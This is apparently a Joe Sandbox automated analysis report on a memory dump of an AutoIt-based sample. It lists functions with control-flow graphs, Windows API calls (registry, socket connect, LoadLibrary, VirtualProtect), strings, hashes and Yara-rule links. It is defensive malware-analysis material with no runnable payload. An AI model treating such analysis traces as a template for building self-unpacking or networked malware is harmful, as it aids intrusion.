                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                                  • Opcode ID: bbe0e49d9db48900c2f0e3e5b76ae90fcf0bcd70c73cfe65831fa4545f0f4789
                                                                                                                                                                  • Instruction ID: 95533afe616cba3690baea3efdc2610f2fa7febc8355bbc57a22ae9e85fb2bea
                                                                                                                                                                  • Opcode Fuzzy Hash: bbe0e49d9db48900c2f0e3e5b76ae90fcf0bcd70c73cfe65831fa4545f0f4789
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE1D4B1A2021AAFDF10DFA4D885BAEB7B5FF48314F248429F945BB281D7709D61CB50
                                                                                                                                                                  Function 0023BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1591 23bf80-23bfe1 call 201970 1594 23bfe7-23bfeb 1591->1594 1595 23c21b-23c21d 1591->1595 1594->1595 1597 23bff1-23bff6 1594->1597 1596 23c21e-23c21f 1595->1596 1598 23c224-23c226 1596->1598 1597->1595 1599 23bffc-23c00b call 22be14 1597->1599 1600 23c227 1598->1600 1605 23c011-23c015 1599->1605 1606 23c158-23c15c 1599->1606 1602 23c229 call 23c235 1600->1602 1609 23c22e-23c232 1602->1609 1610 23c017-23c019 1605->1610 1611 23c01b 1605->1611 1607 23c15e-23c160 1606->1607 1608 23c16d 1606->1608 1613 23c16f-23c171 1607->1613 1608->1613 1612 23c01d-23c01f 1610->1612 1611->1612 1614 23c033-23c03e 1612->1614 1615 23c021-23c025 1612->1615 1613->1596 1616 23c177-23c17b 1613->1616 1614->1600 1615->1614 1617 23c027-23c031 1615->1617 1618 23c181 1616->1618 1619 23c17d-23c17f 1616->1619 1617->1614 1620 23c043-23c05f 1617->1620 1621 23c183-23c186 1618->1621 1619->1621 1628 23c061-23c065 1620->1628 1629 23c067-23c081 1620->1629 1622 23c193-23c197 1621->1622 1623 23c188-23c18e 1621->1623 1624 23c199-23c19b 1622->1624 1625 23c19d 1622->1625 1623->1598 1627 23c19f-23c1c9 VariantInit VariantClear 1624->1627 1625->1627 1634 23c1e6-23c1ea 1627->1634 1635 23c1cb-23c1cd 1627->1635 1628->1629 1630 23c090-23c0e5 call 1ffa89 VariantInit call 201a00 1628->1630 1636 23c083-23c087 1629->1636 1637 23c089 1629->1637 1653 23c0e7-23c0f1 1630->1653 1654 23c108-23c10d 1630->1654 1640 23c1f0-23c1fe call 1f2570 1634->1640 1641 23c1ec-23c1ee 1634->1641 1635->1634 1639 23c1cf-23c1e1 call 1f2570 1635->1639 1636->1630 1636->1637 1637->1630 1652 23c0fb-23c0fe 1639->1652 1644 23c201-23c219 call 22a6f6 VariantClear 1640->1644 1641->1640 1641->1644 1644->1609 1652->1602 1655 23c103-23c106 1653->1655 1656 23c0f3-23c0fa 1653->1656 1657 23c162-23c16b 1654->1657 1658 23c10f-23c131 1654->1658 1655->1652 1656->1652 1657->1652 1661 23c133-23c139 1658->1661 1662 23c13b-23c13d 1658->1662 1661->1652 1663 23c141-23c157 call 22a6f6 1662->1663 1663->1606
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                                                  • Opcode ID: c1dead9aa01bd29041b51227c123fbc415529d72284d687cf7160627cd454d08
                                                                                                                                                                  • Instruction ID: 25ea882710c5a394e0f05e52d0f14e2effee18b6568df76fb8d23149bc63232b
                                                                                                                                                                  • Opcode Fuzzy Hash: c1dead9aa01bd29041b51227c123fbc415529d72284d687cf7160627cd454d08
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E917FB1A2021AABDF24DFA4DC44FAFB7B8AF45710F208119F919BB241D7709955CFA0
                                                                                                                                                                  Function 001E2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2ECB
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2EEC
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 001E2F00
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 001E2F09
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                  • Opcode ID: 6318be21472bf8e540bc0294f0ea969c8c076952dfc3c1a8ed2f07d4929c7229
                                                                                                                                                                  • Instruction ID: 7b630763d009c725b16428678b338c43bcd0cac0216926531bd76836d54be858
                                                                                                                                                                  • Opcode Fuzzy Hash: 6318be21472bf8e540bc0294f0ea969c8c076952dfc3c1a8ed2f07d4929c7229
                                                                                                                                                                  • Instruction Fuzzy Hash: 00F0BD71A502E47BD7215757BC4CE673E7DE7C7F20F01411AFE08921A0D96108A5DA71
                                                                                                                                                                  Function 0023936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00239409
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239416
                                                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0023943A
                                                                                                                                                                  • _strlen.LIBCMT ref: 00239484
                                                                                                                                                                  • _memmove.LIBCMT ref: 002394CA
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002394F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2795762555-0
                                                                                                                                                                  • Opcode ID: 3449dd4f6f86919003c97ebb61c4ac5c101e8530e45d02ba53e028b68811ee50
                                                                                                                                                                  • Instruction ID: 067a8f6af3eb95d56bc7ca7a987b27d5f99b4e93c65ccb096cdd0fef972b1003
                                                                                                                                                                  • Opcode Fuzzy Hash: 3449dd4f6f86919003c97ebb61c4ac5c101e8530e45d02ba53e028b68811ee50
                                                                                                                                                                  • Instruction Fuzzy Hash: 8041C6B1A10208AFCB04EFA4DC85EAEB7BDEF59310F108169F516972D2DB709E51CB60
                                                                                                                                                                  Function 001FEB05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,001FEADA,?,?), ref: 001FEB27
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,001FEADA,?,?), ref: 00254B26
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,001FEADA,?,?), ref: 00254B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$Open
                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                  • API String ID: 1606891134-614718249
                                                                                                                                                                  • Opcode ID: eaeed8ebcfdd11a866fcb58b8ef4c9fe704959e96fca42963bb72556bdd2136b
                                                                                                                                                                  • Instruction ID: 066435271b77ba1d440993a3e5b63f522cc428a14a41583346d6cdb87b717eb3
                                                                                                                                                                  • Opcode Fuzzy Hash: eaeed8ebcfdd11a866fcb58b8ef4c9fe704959e96fca42963bb72556bdd2136b
                                                                                                                                                                  • Instruction Fuzzy Hash: D4113D71A1111CBEEB04ABA4DD86EBE77BCEF04358F104059F506E6091EAB0AE55DB50
                                                                                                                                                                  Function 003430B0 Relevance: 7.7, APIs: 5, Instructions: 206memorylibraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 003431EA
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(?,0033CFF9), ref: 00343208
                                                                                                                                                                  • ExitProcess.KERNEL32(?,0033CFF9), ref: 00343219
                                                                                                                                                                  • VirtualProtect.KERNEL32(001E0000,00001000,00000004,?,00000000), ref: 00343267
                                                                                                                                                                  • VirtualProtect.KERNEL32(001E0000,00001000), ref: 0034327C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual$ExitLibraryLoadProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3729624760-0
                                                                                                                                                                  • Opcode ID: db49d1d5180910b7118147474119da5e83183e0696276ef66c36373abbdf2a8e
                                                                                                                                                                  • Instruction ID: ffaa3e1e61fa6698294b4618f1a6d9e7326a5a21bea83925f68bbbeda84e2158
                                                                                                                                                                  • Opcode Fuzzy Hash: db49d1d5180910b7118147474119da5e83183e0696276ef66c36373abbdf2a8e
                                                                                                                                                                  • Instruction Fuzzy Hash: DA512B72A543525BD722AEB8CCC06B4B7E4EB513247290B38C5E2CF7C5EBD07A068760
                                                                                                                                                                  Function 00226D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3B1E: _wcsncpy.LIBCMT ref: 001E3B32
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00226DBA
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00226DC5
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226DD9
                                                                                                                                                                  • _wcsrchr.LIBCMT ref: 00226DFB
                                                                                                                                                                    • Part of subcall function 00226D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00226E31
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                                                  • Opcode ID: 5dd05ce1cc14537100bd82900eaaddb991907edb4e01eb45fd526b5829954aae
                                                                                                                                                                  • Instruction ID: ddb211dfb9bf6f7514a4174638f9ab97b6909054c4f5bdff3f4703ce1766673b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd05ce1cc14537100bd82900eaaddb991907edb4e01eb45fd526b5829954aae
                                                                                                                                                                  • Instruction Fuzzy Hash: C421EB76B2132AA6DB106BF4FC4EFEA73ACCF05310F204595E425C30D2EB60CEA48A50
                                                                                                                                                                  Function 00239122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0023ACD3: inet_addr.WS2_32(00000000), ref: 0023ACF5
                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00239160
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 0023916F
                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0023918B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                                                  • Opcode ID: 6f2f509006a0e66ba0949f543141051607db52e66cdf27675b46614910ffb366
                                                                                                                                                                  • Instruction ID: a1c0fcd2c87e1eb439c18e65f97675b1ad87780b9c98b2b086d80dcae5af3bde
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2f509006a0e66ba0949f543141051607db52e66cdf27675b46614910ffb366
                                                                                                                                                                  • Instruction Fuzzy Hash: B521C071710215AFCB00AF68DC89B6EB7A9EF49720F048419F94AAB3D1CBB0EC418B51
                                                                                                                                                                  Function 0023F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: dE)
                                                                                                                                                                  • API String ID: 0-2133039554
                                                                                                                                                                  • Opcode ID: 81374799f4f251e81205ed29509ed1eab9430827f1c281bea73fc150b46b515b
                                                                                                                                                                  • Instruction ID: 4f681bbaa58bf255cd757fff4d57d91c1dd9a71a2b81a2bd96da99d9a5d4c2ab
                                                                                                                                                                  • Opcode Fuzzy Hash: 81374799f4f251e81205ed29509ed1eab9430827f1c281bea73fc150b46b515b
                                                                                                                                                                  • Instruction Fuzzy Hash: BBF179B1A187059FC710DF24D980B6AB7E5FF88314F10892EF9998B292D770E915CF82
                                                                                                                                                                  Function 001E3DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001E34E2,?,00000001), ref: 001E3FCD
                                                                                                                                                                  • _free.LIBCMT ref: 00253C27
                                                                                                                                                                  • _free.LIBCMT ref: 00253C6E
                                                                                                                                                                    • Part of subcall function 001EBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002A22E8,?,00000000,?,001E3E2E,?,00000000,?,0027DBF0,00000000,?), ref: 001EBE8B
                                                                                                                                                                    • Part of subcall function 001EBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,001E3E2E,?,00000000,?,0027DBF0,00000000,?,00000002), ref: 001EBEA7
                                                                                                                                                                    • Part of subcall function 001EBDF0: __wsplitpath.LIBCMT ref: 001EBF19
                                                                                                                                                                    • Part of subcall function 001EBDF0: _wcscpy.LIBCMT ref: 001EBF31
                                                                                                                                                                    • Part of subcall function 001EBDF0: _wcscat.LIBCMT ref: 001EBF46
                                                                                                                                                                    • Part of subcall function 001EBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 001EBF56
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                  • API String ID: 1510338132-1757145024
                                                                                                                                                                  • Opcode ID: 1eea7a41e2da7f46be52c11f7373e4254830329a16251afaaa602020999e046f
                                                                                                                                                                  • Instruction ID: 8c42f154ff81edf2dd66681cbcccb77f3775e418109a424e16450cf3005a3a0d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1eea7a41e2da7f46be52c11f7373e4254830329a16251afaaa602020999e046f
                                                                                                                                                                  • Instruction Fuzzy Hash: CB919271920259AFCF04EFA4CC919EEB7B4BF18354F504019F816EB291DB749E29CB54
                                                                                                                                                                  Function 001FC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001FC948,SwapMouseButtons,00000004,?), ref: 001FC979
                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,001FC948,SwapMouseButtons,00000004,?,?,?,?,001FBF22), ref: 001FC99A
                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,001FC948,SwapMouseButtons,00000004,?,?,?,?,001FBF22), ref: 001FC9BC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                                  • Opcode ID: 8fc5c5c4d92cd9565c2f1978ed18c810f2f0dc74c87d6bb9c146e2d809e3d89f
                                                                                                                                                                  • Instruction ID: 6d91fe43bdf1e3974b69de426b0d34d11e522776409fc1d5dbaf9c42900c95c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fc5c5c4d92cd9565c2f1978ed18c810f2f0dc74c87d6bb9c146e2d809e3d89f
                                                                                                                                                                  • Instruction Fuzzy Hash: DD113C75A1160CBFDB118F64DD84EBE77B8FF04748F10845AEA45E7210D7B19E50ABA0
                                                                                                                                                                  Function 0021A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
